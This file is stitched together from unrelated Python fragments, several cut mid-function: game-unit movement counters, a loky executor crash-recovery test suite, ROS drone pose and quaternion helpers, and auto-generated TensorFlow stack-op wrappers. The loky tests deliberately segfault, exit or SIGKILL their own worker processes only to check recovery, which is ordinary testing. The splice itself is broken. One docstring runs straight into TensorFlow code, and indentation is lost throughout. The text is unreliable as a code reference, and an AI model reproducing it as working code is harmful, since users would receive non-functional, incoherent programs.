if 1 < actions[i] < 6:
if move_in_shoot_not_counted:
self.move_in_shoot_range_team1[i] += 1
move_in_shoot_not_counted = False
x_diff = new_pos_team_1[i][0] - t_unit.pos.x
y_diff = new_pos_team_1[i][1] - t_unit.pos.y
if actions[i] == 2:
# north
if y_diff < 0:
self.move_toward_in_shoot_range_team1[
i][t_id] += 1
else:
self.move_away_in_shoot_range_team1[i][
t_id] += 1
if actions[i] == 3:
# south
if y_diff > 0:
self.move_toward_in_shoot_range_team1[
i][t_id] += 1
else:
self.move_away_in_shoot_range_team1[i][
t_id] += 1
if actions[i] == 4:
# east
if x_diff < 0:
self.move_toward_in_shoot_range_team1[
i][t_id] += 1
else:
self.move_away_in_shoot_range_team1[i][
t_id] += 1
if actions[i] == 5:
# west
if x_diff > 0:
self.move_toward_in_shoot_range_team1[
i][t_id] += 1
else:
self.move_away_in_shoot_range_team1[i][
t_id] += 1
elif dist <= sight_range:
self.once_in_sight_range_opponent_team_1[i][
t_id] = True
if 1 < actions[i] < 6:
if move_in_sight_not_counted:
self.move_in_sight_range_team1[i] += 1
move_in_sight_not_counted = False
x_diff = new_pos_team_1[i][0] - t_unit.pos.x
y_diff = new_pos_team_1[i][1] - t_unit.pos.y
if actions[i] == 2:
# north
if y_diff < 0:
self.move_toward_in_sight_range_team1[
i][t_id] += 1
else:
self.move_away_in_sight_range_team1[i][
t_id] += 1
if actions[i] == 3:
# south
if y_diff > 0:
self.move_toward_in_sight_range_team1[
i][t_id] += 1
else:
self.move_away_in_sight_range_team1[i][
t_id] += 1
if actions[i] == 4:
# east
if x_diff < 0:
self.move_toward_in_sight_range_team1[
i][t_id] += 1
else:
self.move_away_in_sight_range_team1[i][
t_id] += 1
if actions[i] == 5:
# west
if x_diff > 0:
self.move_toward_in_sight_range_team1[
i][t_id] += 1
else:
self.move_away_in_sight_range_team1[i][
t_id] += 1
for i in range(self.n_enemies):
shoot_range = self.unit_shoot_range(self.n_agents + i)
sight_range = self.unit_sight_range(self.n_agents + i)
move_in_shoot_not_counted = True
move_in_sight_not_counted = True
action__ = actions[self.n_agents + i]
for t_id, t_unit in self.agents.items():
if t_unit.health > 0:
dist = self.distance(
new_pos_team_2[i][0], new_pos_team_2[i][1],
t_unit.pos.x, t_unit.pos.y
)
if dist <= shoot_range:
self.once_in_shoot_range_opponent_team_2[i][
t_id] = True
if 1 < action__ < 6:
if move_in_shoot_not_counted:
self.move_in_shoot_range_team2[i] += 1
move_in_shoot_not_counted = False
x_diff = new_pos_team_2[i][0] - t_unit.pos.x
y_diff = new_pos_team_2[i][1] - t_unit.pos.y
if action__ == 2:
# north
if y_diff < 0:
self.move_toward_in_shoot_range_team2[
i][t_id] += 1
else:
self.move_away_in_shoot_range_team2[i][
t_id] += 1
if action__ == 3:
# south
if y_diff > 0:
self.move_toward_in_shoot_range_team2[
i][t_id] += 1
else:
self.move_away_in_shoot_range_team2[i][
t_id] += 1
if action__ == 4:
# east
if x_diff < 0:
self.move_toward_in_shoot_range_team2[
i][t_id] += 1
else:
self.move_away_in_shoot_range_team2[i][
t_id] += 1
if action__ == 5:
# west
if x_diff > 0:
self.move_toward_in_shoot_range_team2[
i][t_id] += 1
else:
self.move_away_in_shoot_range_team2[i][
t_id] += 1
import os
import sys
import gc
import ctypes
import psutil
import pytest
import warnings
import threading
from time import sleep
from multiprocessing import util, current_process
from pickle import PicklingError, UnpicklingError
from distutils.version import LooseVersion
import loky
from loky import cpu_count
from loky import get_reusable_executor
from loky.process_executor import _RemoteTraceback, TerminatedWorkerError
from loky.process_executor import BrokenProcessPool, ShutdownExecutorError
from loky.reusable_executor import _ReusablePoolExecutor
import cloudpickle
from ._executor_mixin import ReusableExecutorMixin
from .utils import TimingWrapper, id_sleep, check_python_subprocess_call
from .utils import filter_match
cloudpickle_version = LooseVersion(cloudpickle.__version__)
# Compat windows
if sys.platform == "win32":
from signal import SIGTERM as SIGKILL
libc = ctypes.cdll.msvcrt
else:
from signal import SIGKILL
from ctypes.util import find_library
libc = ctypes.CDLL(find_library("c"))
try:
import numpy as np
except ImportError:
np = None
# Backward compat for python2 cPickle module
PICKLING_ERRORS = (PicklingError,)
try:
import cPickle
PICKLING_ERRORS += (cPickle.PicklingError,)
except ImportError:
pass
def clean_warning_registry():
"""Safe way to reset warnings."""
warnings.resetwarnings()
reg = "__warningregistry__"
for mod_name, mod in list(sys.modules.items()):
if hasattr(mod, reg):
getattr(mod, reg).clear()
def wait_dead(worker, n_tries=1000, delay=0.001):
"""Wait for process pid to die"""
for i in range(n_tries):
if worker.exitcode is not None:
return
sleep(delay)
raise RuntimeError("Process %d failed to die for at least %0.3fs" %
(worker.pid, delay * n_tries))
def crash():
"""Induces a segfault"""
import faulthandler
faulthandler._sigsegv()
def exit():
"""Induces a sys exit with exitcode 0"""
sys.exit(0)
def c_exit(exitcode=0):
"""Induces a libc exit with exitcode 0"""
libc.exit(exitcode)
def sleep_then_check_pids_exist(arg):
"""Sleep for some time and the check if all the passed pids exist"""
time, pids = arg
sleep(time)
res = True
for p in pids:
res &= psutil.pid_exists(p)
return res
def kill_friend(pid, delay=0):
"""Function that send SIGKILL at process pid"""
sleep(delay)
try:
os.kill(pid, SIGKILL)
except (PermissionError, ProcessLookupError) as e:
if psutil.pid_exists(pid):
util.debug("Fail to kill an alive process?!?")
raise e
util.debug("process {} was already dead".format(pid))
def raise_error(etype=UnpicklingError, message=None):
"""Function that raises an Exception in process"""
raise etype(message)
def return_instance(cls):
"""Function that returns a instance of cls"""
return cls()
class SayWhenError(ValueError):
pass
def exception_throwing_generator(total, when):
for i in range(total):
if i == when:
raise SayWhenError("Somebody said when")
yield i
def do_nothing(arg):
"""Function that return True, test passing argument"""
return True
class CrashAtPickle(object):
"""Bad object that triggers a segfault at pickling time."""
def __reduce__(self):
crash()
class CrashAtUnpickle(object):
"""Bad object that triggers a segfault at unpickling time."""
def __reduce__(self):
return crash, ()
class ExitAtPickle(object):
"""Bad object that triggers a segfault at pickling time."""
def __reduce__(self):
exit()
class ExitAtUnpickle(object):
"""Bad object that triggers a process exit at unpickling time."""
def __reduce__(self):
return exit, ()
class CExitAtPickle(object):
"""Bad object that triggers a segfault at pickling time."""
def __reduce__(self):
c_exit()
class CExitAtUnpickle(object):
"""Bad object that triggers a process exit at unpickling time."""
def __reduce__(self):
return c_exit, ()
class ErrorAtPickle(object):
"""Bad object that raises an error at pickling time."""
def __init__(self, fail=True):
self.fail = fail
def __reduce__(self):
if self.fail:
raise PicklingError("Error in pickle")
else:
return id, (42, )
class ErrorAtUnpickle(object):
"""Bad object that triggers a process exit at unpickling time."""
def __init__(self, etype=UnpicklingError, message='the error message'):
self.etype = etype
self.message = message
def __reduce__(self):
return raise_error, (self.etype, self.message)
class CrashAtGCInWorker(object):
"""Bad object that triggers a segfault at call item GC time"""
def __del__(self):
if current_process().name != "MainProcess":
crash()
class CExitAtGCInWorker(object):
"""Exit worker at call item GC time"""
def __del__(self):
if current_process().name != "MainProcess":
c_exit()
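# Illustrative sketch (not part of the original test suite) of how the
# fault-injection helpers above exercise the reusable executor: a worker
# killed by a segfault surfaces as TerminatedWorkerError, and the factory
# then hands back a fresh, working executor.
def _example_crash_recovery():
    executor = get_reusable_executor(max_workers=2)
    with pytest.raises(TerminatedWorkerError):
        # `crash` segfaults the worker; the error is raised on result()
        executor.submit(crash).result()
    # Requesting an executor again recovers from the broken pool
    executor = get_reusable_executor(max_workers=2)
    assert executor.submit(id_sleep, 42, 0.0).result() == 42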
class TestExecutorDeadLock(ReusableExecutorMixin):
crash_cases = [
        # Check problems occurring while pickling a task
(id, (ExitAtPickle(),), PicklingError, None),
(id, (ErrorAtPickle(),), PicklingError, None),
        # Check problems occurring while unpickling a task on workers
(id, (ExitAtUnpickle(),), BrokenProcessPool, r"SystemExit"),
(id, (CExitAtUnpickle(),), TerminatedWorkerError, r"EXIT\(0\)"),
(id, (ErrorAtUnpickle(),), BrokenProcessPool, r"UnpicklingError"),
(id, (CrashAtUnpickle(),), TerminatedWorkerError, r"SIGSEGV"),
        # Check problems occurring during function execution on workers
(crash, (), TerminatedWorkerError, r"SIGSEGV"),
(exit, (), SystemExit, None),
(c_exit, (), TerminatedWorkerError, r"EXIT\(0\)"),
(raise_error, (RuntimeError,), RuntimeError, None),
        # Check problems occurring while pickling a task result
# on workers
(return_instance, (CrashAtPickle,), TerminatedWorkerError, r"SIGSEGV"),
(return_instance, (ExitAtPickle,), SystemExit, None),
(return_instance, (CExitAtPickle,), TerminatedWorkerError,
r"EXIT\(0\)"),
(return_instance, (ErrorAtPickle,), PicklingError, None),
        # Check problems occurring while unpickling a task in
# the result_handler thread
(return_instance, (ExitAtUnpickle,), BrokenProcessPool, r"SystemExit"),
(return_instance, (ErrorAtUnpickle,), BrokenProcessPool,
r"UnpicklingError"),
]
@pytest.mark.parametrize("func, args, expected_err, match", crash_cases)
def test_crashes(self, func, args, expected_err, match):
"""Test various reusable_executor crash handling"""
executor = get_reusable_executor(max_workers=2)
res = executor.submit(func, *args)
match_err = None
if expected_err is TerminatedWorkerError:
match_err = filter_match(match)
match = None
with pytest.raises(expected_err, match=match_err) as exc_info:
res.result()
# For remote traceback, ensure that the cause contains the original
# error
if match is not None:
with pytest.raises(_RemoteTraceback, match=match):
raise exc_info.value.__cause__
@pytest.mark.parametrize("func, args, expected_err, match", crash_cases)
def test_in_callback_submit_with_crash(self, func, args, expected_err,
match):
"""Test the recovery from callback crash"""
executor = get_reusable_executor(max_workers=2, timeout=12)
def in_callback_submit(future):
future2 = get_reusable_executor(
max_workers=2, timeout=12).submit(func, *args)
# Store the future of the job submitted in the callback to make it
# easy to introspect.
future.callback_future = future2
future.callback_done.set()
        # Make sure the first submitted job lasts a bit, so that
# the callback will be called in the queue manager thread and not
# immediately in the main thread.
delay = 0.1
f = executor.submit(id_sleep, 42, delay)
f.callback_done = threading.Event()
f.add_done_callback(in_callback_submit)
assert f.result() == 42
if not f.callback_done.wait(timeout=3):
raise AssertionError('callback not done before timeout')
match_err = None
if expected_err is TerminatedWorkerError:
match_err = filter_match(match)
match = None
with pytest.raises(expected_err, match=match_err) as exc_info:
f.callback_future.result()
# For remote traceback, ensure that the cause contains the original
# error
if match is not None:
with pytest.raises(_RemoteTraceback, match=match):
raise exc_info.value.__cause__
def test_callback_crash_on_submit(self):
"""Errors in the callback execution directly in queue manager thread.
This case can break the process executor and we want to make sure
that we can detect the issue and recover by calling
get_reusable_executor.
"""
executor = get_reusable_executor(max_workers=2)
        # Make sure the first submitted job lasts a bit, so that
# the callback will be called in the queue manager thread and not
# immediately in the main thread.
delay = 0.1
f = executor.submit(id_sleep, 42, delay)
f.add_done_callback(lambda _: exit())
assert f.result() == 42
assert executor.submit(id_sleep, 42, 0.1).result() == 42
executor = get_reusable_executor(max_workers=2)
f = executor.submit(id_sleep, 42, delay)
f.add_done_callback(lambda _: raise_error())
assert f.result() == 42
assert executor.submit(id_sleep, 42, 0.).result() == 42
def test_deadlock_kill(self):
"""Test deadlock recovery for reusable_executor"""
executor = get_reusable_executor(max_workers=1, timeout=None)
# trigger the spawning of the worker process
executor.submit(sleep, 0.1)
worker = next(iter(executor._processes.values()))
with pytest.warns(UserWarning) as recorded_warnings:
executor = get_reusable_executor(max_workers=2, timeout=None)
assert len(recorded_warnings) == 1
expected_msg = ("Trying to resize an executor with running jobs:"
" waiting for jobs completion before resizing.")
assert recorded_warnings[0].message.args[0] == expected_msg
os.kill(worker.pid, SIGKILL)
wait_dead(worker)
# wait for the executor to be able to detect the issue and set itself
# in broken state:
sleep(.5)
with pytest.raises(TerminatedWorkerError,
match=filter_match(r"SIGKILL")):
executor.submit(id_sleep, 42, 0.1).result()
# the get_reusable_executor factory should be able to create a new
# working instance
executor = get_reusable_executor(max_workers=2, timeout=None)
assert executor.submit(id_sleep, 42, 0.).result() == 42
@pytest.mark.parametrize("n_proc", [1, 2, 5, 13])
def test_crash_races(self, n_proc):
"""Test the race conditions in reusable_executor crash handling"""
if (sys.platform == 'win32' and sys.version_info >= (3, 8)
and n_proc > 5):
pytest.skip(
"On win32, the paging size can be too small to import numpy "
"multiple times in the sub-processes (imported when loading "
"this file). Skipping while no better solution is found. See "
"https://github.com/joblib/loky/issues/279 for more details."
)
        # Test for an external crash signal coming from a neighbor,
        # with various race setups
executor = get_reusable_executor(max_workers=n_proc, timeout=None)
executor.map(id, range(n_proc)) # trigger the creation of the workers
pids = list(executor._processes.keys())
assert len(pids) == n_proc
assert None not in pids
res = executor.map(sleep_then_check_pids_exist,
[(.0001 * (j // 2), pids)
for j in range(2 * n_proc)])
assert all(list(res))
with pytest.raises(TerminatedWorkerError,
match=filter_match(r"SIGKILL")):
res = executor.map(kill_friend, pids[::-1])
list(res)
def test_imap_handle_iterable_exception(self):
        # How errors raised during imap generation are caught depends on
        # the Python build/version
executor = get_reusable_executor(max_workers=2)
with pytest.raises(SayWhenError):
executor.map(id_sleep, exception_throwing_generator(10, 3),
chunksize=1)
# SayWhenError seen at start of problematic chunk's results
executor = get_reusable_executor(max_workers=2)
with pytest.raises(SayWhenError):
executor.map(id_sleep, exception_throwing_generator(20, 7),
chunksize=2)
executor = get_reusable_executor(max_workers=2)
with pytest.raises(SayWhenError):
executor.map(id_sleep, exception_throwing_generator(20, 7),
chunksize=4)
def test_queue_full_deadlock(self):
executor = get_reusable_executor(max_workers=1)
fs_fail = [executor.submit(do_nothing, ErrorAtPickle(True))
for i in range(100)]
fs = [executor.submit(do_nothing, ErrorAtPickle(False))
for i in range(100)]
with pytest.raises(PicklingError):
fs_fail[99].result()
assert fs[99].result()
def test_informative_error_when_fail_at_unpickle(self):
executor = get_reusable_executor(max_workers=2)
obj = ErrorAtUnpickle(RuntimeError, 'message raised in child')
f = executor.submit(id, obj)
with pytest.raises(BrokenProcessPool) as exc_info:
f.result()
assert 'RuntimeError' in str(exc_info.value.__cause__)
        assert 'message raised in child' in str(exc_info.value.__cause__)
# -*- coding: utf-8 -*-
"""
Helper functions and classes for general use.
"""
from __future__ import division
from functools import partial, update_wrapper
from time import localtime, strftime
import numpy as np
from numpy.linalg import norm
import rospy
from geometry_msgs.msg import Point, PoseStamped, Quaternion
from sensor_msgs.msg import Image
from std_msgs.msg import Header
import tf
d2r = np.deg2rad
r2d = np.rad2deg
EULER_CONVENTION = "rxyz"
def unit_vector(v):
"""
    Scale the vector to unit length while preserving its direction.
Parameters
----------
v : array-like
A vector to be normalized.
Returns
-------
np.ndarray
The normalized vector, or the original vector if it has a length of 0.
"""
norm = np.linalg.norm(v)
if norm:
return v / norm
else:
return np.asarray(v)
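# Illustrative examples of the helper above:
#
#     unit_vector([3.0, 4.0, 0.0])  # -> array([0.6, 0.8, 0. ])
#     unit_vector([0.0, 0.0, 0.0])  # -> array([0., 0., 0.]) (zero vector unchanged)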
# noinspection PyPep8Naming
class memoize(object):
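    """
    Memoize a method's return values on the instance it is called on.

    Results are cached in the instance's ``__cache__`` dictionary, keyed by
    the wrapped function, the positional arguments and the keyword arguments,
    so repeated calls with the same arguments reuse the stored result.
    """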
def __init__(self, func):
self.func = func
update_wrapper(self, func)
def __get__(self, instance, owner):
if instance is None:
return self.func
return partial(self, instance)
def __call__(self, *args, **kwargs):
obj = args[0]
try:
cache = obj.__cache__
except AttributeError:
cache = obj.__cache__ = {}
key = (self.func, args[1:], frozenset(kwargs.items()))
try:
res = cache[key]
except KeyError:
res = cache[key] = self.func(*args, **kwargs)
return res
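# Illustrative use of the decorator above (hypothetical class, not part of
# this module): the wrapped method is evaluated once per instance and
# argument combination, and later calls return the cached value.
#
#     class Trajectory(object):
#         @memoize
#         def length(self, resolution):
#             ...  # expensive computation, only run on a cache miss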
class Pose(object):
"""
Convenience wrapper for PoseStamped.
Parameters
----------
pose_stamped : PoseStamped
The pose message.
Attributes
----------
pose_stamped : PoseStamped
The pose message.
position : np.ndarray
The x, y, and z coordinates contained in the pose.
orientation : np.ndarray
The x, y, z, and w quaternion contained in the pose.
header : Header
The header from the pose message
"""
def __init__(self, pose_stamped):
self.pose_stamped = pose_stamped
self.position, self.orientation = self._components(self.pose_stamped)
self.header = self.pose_stamped.header
def rel_position(self, pose, rotation_matrix=None):
"""
        Calculate the position of another pose relative to this one, in the local frame.
Parameters
----------
pose : Pose
The target pose.
rotation_matrix : Optional[np.ndarray]
The rotation matrix to use. If not provided, the rotation matrix of
the current pose is used.
Returns
-------
np.ndarray
The x, y, z relative positions.
"""
if rotation_matrix is None:
rotation_matrix = Quat.rotation_matrix(self.orientation)
return rotation_matrix.dot(pose.position - self.position)
def rel_euler(self, pose):
"""
Calculate the relative angle with another pose.
Parameters
----------
pose : Pose
The target pose.
Returns
-------
np.ndarray
The relative angle as Euler, in the order of pitch, roll, yaw.
"""
return Quat.to_euler(Quat.rel_rotation(pose.orientation,
self.orientation))
def distance(self, pose):
"""
Calculate the distance to another pose.
Parameters
----------
pose : Pose
The target pose.
Returns
-------
float
The distance to the target pose.
"""
return norm(pose.position - self.position)
@staticmethod
def _components(pose_stamped):
"""
Return the position and orientation of a PoseStamped as numpy arrays.
Parameters
----------
pose_stamped : Pose(WithCovariance)?(Stamped)?
The pose to be decomposed.
Returns
-------
position : np.ndarray
The x, y, and z coordinates contained in the pose.
orientation : np.ndarray
The x, y, z, and w quaternion contained in the pose.
"""
position = np.array([pose_stamped.pose.position.x,
pose_stamped.pose.position.y,
pose_stamped.pose.position.z])
orientation = np.array([pose_stamped.pose.orientation.x,
pose_stamped.pose.orientation.y,
pose_stamped.pose.orientation.z,
pose_stamped.pose.orientation.w])
return position, orientation
@classmethod
def from_components(cls, position, orientation, sequence=0):
"""
Generate a Pose from its components.
Parameters
----------
position : Sequence[float]
The x, y, and z coordinates of the pose.
orientation : Sequence[float]
The x, y, z, and w quaternion of the pose.
sequence : Optional[int]
The sequence number of the pose.
Returns
-------
Pose
The generated pose.
"""
return cls(cls.generate_stamped(position, orientation, sequence))
@staticmethod
def generate_stamped(position, orientation, sequence=0):
"""
Generate a PoseStamped from its components.
Parameters
----------
position : Sequence[float]
The x, y, and z coordinates of the pose.
orientation : Sequence[float]
The x, y, z, and w quaternion of the pose.
sequence : Optional[int]
The sequence number of the pose.
Returns
-------
PoseStamped
The generated pose.
"""
pose_stamped = PoseStamped()
pose_stamped.header.seq = sequence
try:
pose_stamped.header.stamp = rospy.Time.now()
except rospy.exceptions.ROSInitException:
pass
pose_stamped.pose.position = Point(*position)
pose_stamped.pose.orientation = Quaternion(*orientation)
return pose_stamped
def __repr__(self):
return "<Pose ({position}, {orientation})>".format(
position=self.position.tolist(),
orientation=self.orientation.tolist(),
time=self.header.stamp)
def __str__(self):
return "<Pose ({position}, {orientation}): {time}>".format(
position=self.position.tolist(),
orientation=self.orientation.tolist(),
time=self.header.stamp)
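# Illustrative usage of Pose (example values; identity orientations, so the
# local frame of p1 coincides with the world frame):
#
#     p1 = Pose.from_components([0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 1.0])
#     p2 = Pose.from_components([1.0, 2.0, 2.0], [0.0, 0.0, 0.0, 1.0])
#     p1.distance(p2)      # -> 3.0
#     p1.rel_position(p2)  # -> array([1., 2., 2.]) in p1's local frame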
class Frame(object):
"""
Encapsulate an image and the pose it was taken in.
Parameters
----------
pose_stamped : PoseStamped
The pose of the drone when the image was taken.
image : Image
The image that was taken.
Attributes
----------
pose_stamped : PoseStamped
The raw pose message of the drone at which the image was taken.
pose : Pose
The pose of the drone at which the image was taken.
rotation_matrix : np.ndarray
The rotation matrix of the frame orientation.
image : Image
The image that was taken.
stamp : rospy.rostime.Time
The timestamp of the pose.
stamp_str : str
The timestamp of the pose, in human readable format.
"""
def __init__(self, pose_stamped, image):
self.pose_stamped = pose_stamped
self.pose = Pose(pose_stamped)
self.rotation_matrix = Quat.rotation_matrix(self.pose.orientation)
self.image = image
self.stamp = self.pose.header.stamp
self.stamp_str = strftime("%Y-%m-%d %H:%M:%S",
localtime(self.stamp.to_time()))
@memoize
def rel_position(self, pose):
"""
        Calculate the position of another pose relative to this one, in the local frame.
Parameters
----------
pose : Pose
The target pose.
Returns
-------
np.ndarray
The x, y, z relative positions.
"""
return self.pose.rel_position(pose,
rotation_matrix=self.rotation_matrix)
@memoize
def rel_euler(self, pose):
"""
Calculate the relative angle with another pose.
Parameters
----------
pose : Pose
The target pose.
Returns
-------
np.ndarray
The relative angle as Euler, in the order of pitch, roll, yaw.
"""
return self.pose.rel_euler(pose)
@memoize
def distance(self, pose):
"""
Calculate the distance to another pose.
Parameters
----------
pose : Pose
The target pose.
Returns
-------
float
The distance to the target pose.
"""
return self.pose.distance(pose)
def __repr__(self):
return "<Frame({pose})>".format(pose=self.pose)
class Fov(object):
"""
Field of view methods.
"""
@staticmethod
def d2v(fov_diagonal, aspect_ratio=4 / 3):
"""
Convert a diagonal field of view to vertical.
Parameters
----------
fov_diagonal : float
The diagonal field of view.
aspect_ratio: Optional[float]
The aspect ratio of the display. Default is 4:3.
Returns
-------
float
The vertical field of view.
"""
ratio_diagonal = np.sqrt(1 + aspect_ratio**2)
return 2 * r2d(np.arctan(np.tan(d2r(fov_diagonal) / 2)
/ ratio_diagonal))
@staticmethod
def v2h(fov_vertical, aspect_ratio=4 / 3):
"""
Convert a vertical field of view to horizontal.
Parameters
----------
fov_vertical : float
The vertical field of view.
aspect_ratio: Optional[float]
The aspect ratio of the display. Default is 4:3.
Returns
-------
float
The horizontal field of view.
"""
return 2 * r2d(np.arctan(np.tan(d2r(fov_vertical) / 2) * aspect_ratio))
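# Worked example for the two conversions above, at the default 4:3 aspect
# ratio: a 90 degree diagonal FOV is about a 61.9 degree vertical FOV and
# about a 77.3 degree horizontal FOV.
#
#     Fov.d2v(90)           # -> ~61.93
#     Fov.v2h(Fov.d2v(90))  # -> ~77.32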
class Quat(object):
"""
Quaternion methods.
"""
@staticmethod
def to_euler(quaternion):
"""
Change a quaternion to an Euler angle representation.
Parameters
----------
quaternion : np.ndarray
A quaternion in the order of x, y, z, w.
Returns
-------
np.ndarray
The Euler angle, in the order of pitch, roll, yaw.
"""
# noinspection PyUnresolvedReferences
return tf.transformations.euler_from_quaternion(quaternion,
EULER_CONVENTION)
@staticmethod
def to_axis(quaternion):
"""
Change a quaternion to an axis-angle representation.
Parameters
----------
quaternion : np.ndarray
A quaternion in the order of x, y, z, w.
Notes
-----
θ is in degrees rather than radians, for ease of integration in OpenGL.
Returns
-------
tuple
The angle in axis-angle representation, with the order of θ, x, y,
z. θ is in degrees.
"""
x, y, z, w = unit_vector(quaternion)
angle = r2d(2 * np.arccos(w))
if angle == 0:
axis_x = 1
axis_y = axis_z = 0
elif angle % 180 == 0:
axis_x, axis_y, axis_z = x, y, z
else:
axis_x = x / np.sqrt(1 - w**2)
axis_y = y / np.sqrt(1 - w**2)
axis_z = z / np.sqrt(1 - w**2)
return angle, axis_x, axis_y, axis_z
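    # Illustrative example: a 90 degree rotation about the z axis, i.e.
    # q = (x, y, z, w) = (0, 0, sin(45 deg), cos(45 deg)):
    #
    #     Quat.to_axis([0.0, 0.0, 0.7071, 0.7071])  # -> (~90.0, 0.0, 0.0, ~1.0)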
@staticmethod
def product(a, b):
"""
Find the product of two quaternions.
Parameters
----------
a : Sequence[float]
A quaternion, in the order of x, y, z, w
b : Sequence[float]
A quaternion, in the order of x, y, z, w
Returns
-------
np.ndarray
A quaternion, in the order of x, y, z, w
"""
imaginary_part = a[3] * b[:3] + b[3] * a[:3] + np.cross(a[:3], b[:3])
real_part = a[3] * b[3] - np.dot(a[:3], b[:3])
return np.append(imaginary_part, real_part)
@staticmethod
def inverse(quaternion):
"""
Return the inverse of a quaternion
Parameters
----------
quaternion : Sequence[float]
A quaternion, in the order of x, y, z, w
Returns
-------
np.ndarray
The inverse of the quaternion.
"""
return (quaternion * np.array([-1, -1, -1, 1])
/ np.linalg.norm(quaternion)**2)
@staticmethod
def rel_rotation(a, b):
"""
Find the quaternion which produces a rotation from `a` to `b`.
Parameters
----------
a : Sequence[float]
A quaternion, in the order of x, y, z, w
b : Sequence[float]
            A quaternion, in the order of x, y, z, w
  # Add nodes to the TensorFlow graph.
elem_type = _execute.make_type(elem_type, "elem_type")
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"StackPop", handle=handle, elem_type=elem_type, name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("elem_type", _op._get_attr_type("elem_type"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"StackPop", _inputs_flat, _attrs, _result)
_result, = _result
return _result
StackPop = tf_export("raw_ops.StackPop")(_ops.to_raw_op(stack_pop))
def stack_pop_eager_fallback(handle, elem_type, name, ctx):
raise RuntimeError("stack_pop op does not support eager execution. Arg 'handle' is a ref.")
def stack_pop_v2(handle, elem_type, name=None):
r"""Pop the element at the top of the stack.
Args:
handle: A `Tensor` of type `resource`. The handle to a stack.
elem_type: A `tf.DType`. The type of the elem that is popped.
name: A name for the operation (optional).
Returns:
A `Tensor` of type `elem_type`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx._context_handle, tld.device_name, "StackPopV2", name,
tld.op_callbacks, handle, "elem_type", elem_type)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return stack_pop_v2_eager_fallback(
handle, elem_type=elem_type, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
elem_type = _execute.make_type(elem_type, "elem_type")
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"StackPopV2", handle=handle, elem_type=elem_type, name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("elem_type", _op._get_attr_type("elem_type"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"StackPopV2", _inputs_flat, _attrs, _result)
_result, = _result
return _result
StackPopV2 = tf_export("raw_ops.StackPopV2")(_ops.to_raw_op(stack_pop_v2))
def stack_pop_v2_eager_fallback(handle, elem_type, name, ctx):
elem_type = _execute.make_type(elem_type, "elem_type")
handle = _ops.convert_to_tensor(handle, _dtypes.resource)
_inputs_flat = [handle]
_attrs = ("elem_type", elem_type)
_result = _execute.execute(b"StackPopV2", 1, inputs=_inputs_flat,
attrs=_attrs, ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"StackPopV2", _inputs_flat, _attrs, _result)
_result, = _result
return _result
def stack_push(handle, elem, swap_memory=False, name=None):
r"""Deprecated, use StackPushV2.
Args:
handle: A `Tensor` of type mutable `string`.
elem: A `Tensor`.
swap_memory: An optional `bool`. Defaults to `False`.
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `elem`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
raise RuntimeError("stack_push op does not support eager execution. Arg 'handle' is a ref.")
# Add nodes to the TensorFlow graph.
if swap_memory is None:
swap_memory = False
swap_memory = _execute.make_bool(swap_memory, "swap_memory")
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"StackPush", handle=handle, elem=elem, swap_memory=swap_memory,
name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("T", _op._get_attr_type("T"), "swap_memory",
_op._get_attr_bool("swap_memory"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"StackPush", _inputs_flat, _attrs, _result)
_result, = _result
return _result
StackPush = tf_export("raw_ops.StackPush")(_ops.to_raw_op(stack_push))
def stack_push_eager_fallback(handle, elem, swap_memory, name, ctx):
raise RuntimeError("stack_push op does not support eager execution. Arg 'handle' is a ref.")
def stack_push_v2(handle, elem, swap_memory=False, name=None):
r"""Push an element onto the stack.
Args:
handle: A `Tensor` of type `resource`. The handle to a stack.
elem: A `Tensor`. The tensor to be pushed onto the stack.
swap_memory: An optional `bool`. Defaults to `False`.
Swap `elem` to CPU. Default to false.
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `elem`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx._context_handle, tld.device_name, "StackPushV2", name,
tld.op_callbacks, handle, elem, "swap_memory", swap_memory)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return stack_push_v2_eager_fallback(
handle, elem, swap_memory=swap_memory, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
if swap_memory is None:
swap_memory = False
swap_memory = _execute.make_bool(swap_memory, "swap_memory")
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"StackPushV2", handle=handle, elem=elem, swap_memory=swap_memory,
name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("T", _op._get_attr_type("T"), "swap_memory",
_op._get_attr_bool("swap_memory"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"StackPushV2", _inputs_flat, _attrs, _result)
_result, = _result
return _result
StackPushV2 = tf_export("raw_ops.StackPushV2")(_ops.to_raw_op(stack_push_v2))
def stack_push_v2_eager_fallback(handle, elem, swap_memory, name, ctx):
if swap_memory is None:
swap_memory = False
swap_memory = _execute.make_bool(swap_memory, "swap_memory")
_attr_T, (elem,) = _execute.args_to_matching_eager([elem], ctx)
handle = _ops.convert_to_tensor(handle, _dtypes.resource)
_inputs_flat = [handle, elem]
_attrs = ("T", _attr_T, "swap_memory", swap_memory)
_result = _execute.execute(b"StackPushV2", 1, inputs=_inputs_flat,
attrs=_attrs, ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"StackPushV2", _inputs_flat, _attrs, _result)
